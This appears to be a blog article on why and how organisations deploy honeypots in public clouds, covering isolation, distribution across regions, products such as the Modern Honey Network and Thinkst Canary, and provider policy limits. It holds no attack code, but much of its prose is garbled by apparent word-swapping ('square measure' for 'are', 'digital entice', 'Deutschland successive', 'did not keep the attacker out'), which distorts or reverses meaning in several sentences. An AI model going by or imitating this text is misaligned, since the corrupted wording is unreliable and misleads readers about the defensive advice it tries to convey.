Why Use Honeypots?For an organization that has a reasonably complete security posture, including a mature threat intelligence capability, the implementation of a so-called “honeypot” should be considered. A honeypot is sort of a digital entice that's set for potential attackers. It lures the attackers within by mimicking it to be a target they were searching for, sometimes with deliberate built in vulnerabilities, apparently waiting to be exploited.
Once the attackers use the honeypot system, thinking they have reached the intended target, all actions are recorded and all modified and newly-dropped files are captured. In this method, a great deal can be learned about potential adversaries, their Tools, Techniques and Procedures (TTP’s) and how they would circumvent the organizations actual production security controls. It permits for actually proactive security intelligence gathering, although there are some caveats.
The Issue With HoneypotsA honeypot could be a nice weapon within the arsenal of defensive security groups. Its use does, however, come with some challenges.
The obvious one is that the risk that AN attacker with success exploits a honeypot and so manages to maneuver laterally into the particular production network. It is vital to isolate a honeypot from the other network! This looks like a straightforward task, but it only takes a single forgotten system or a single firewall rule change to create a very dangerous situation. Networks are inherently complex.
Another challenge is that the quantity of your time and therewith, are the costs that come with the management of a honeypot. The system will need to be configured and maintained, of course. But that's not all: The captured activity has to be used inside the organization’s security groups for it to be of any worth. This will take tons of your time to structure and to suit inside operational processes. The information will need lead to actionable intelligence, such as by blocking the adversary’s infrastructure, the creation of Intrusion Prevention System rules or the creation or tuning of malware signatures.
Using the CloudSome of the mentioned challenges will be overcome by employing a public cloud system to host a honeypot.
The public cloud provides complete isolation from any production network. There is additionally no want for specific hardware or dedicated net connections. Once a machine has been compromised and the data is collected, a snapshot can be used to revert the system back to its captured state before the attack took place.
Another nice advantage of employing a public cloud infrastructure for a honeypot preparation is that it will be distributed anyplace within the world by choosing the specified geographical locations inside the cloud system configuration. A detector will be placed in East Asia sooner or later and may be moved to Deutschland successive with simply a couple of mouse clicks. Considering the actual fact that noticeable attacks and attackers will disagree tons looking on the placement of the exposed system, this can be nice for analysis and intelligence gathering functions. A honeypot set inside Russia can see quite totally different vary of attacks and scanning activity compared to a similar system in Brazil. A distributed honeypot network consisting of a manager and several sensors such as the Modern Honey Network (MHN) benefits even more from this flexibility.
Some honeypot product are developed around a personal cloud instance likewise, like the Thinkst (Cloud) Canary. Canary honeypot devices square measure deployed at strategic locations inside the customer’s network. These sensors all report back to a central, cloud-based system allowing the customer to detect perimeter activity and lateral movement inside the production network when a real attacker unexpectedly interacts with one of these sensors. This system doesn't return low-cost, however it'll still offer vital visibility once all different detections have did not keep the attacker out. In this case, the cloud connectivity assists in the preservation of logs, improved customer accessibility and the very quick and easy deployment of what can be a complex honeypot infrastructure.
LimitationsThere is a right away correlation between placement and relevance once it involves honeypots.
For a honeypot to produce the foremost relevant (and actionable) output, it must be somehow coupled to the organization a possible attacker is curious about. this could potentially be via a pretend company website or a registered domain name. solely then can the organization be able to observe attacks that square measure extremely targeted, rather than straightforward scans from attackers trying to find any low-hanging fruit. Of course, if attainable, inserting a honeypot within the organization’s existing cloud perimeter can even facilitate within the identification of targeted attacks, however its isolation must be well-designed.
There is additionally a legal and policy side to the utilization of honeypots. Some cloud suppliers don't significantly just like the plan of directional hackers into their networks and aggregation malware at intervals their infrastructure. After all, once the host is compromised, there's an opportunity it is accustomed attack different targets on the web. once this can be the case, it may harm the name of the cloud supplier (hosting the compromised system) and will even result in the block of that provider’s ip ranges and domains, impacting its different paying customers.
When unsure, invariably look around the web usage policies or contact the supplier for permission before setting up a cloud-based honeypot system.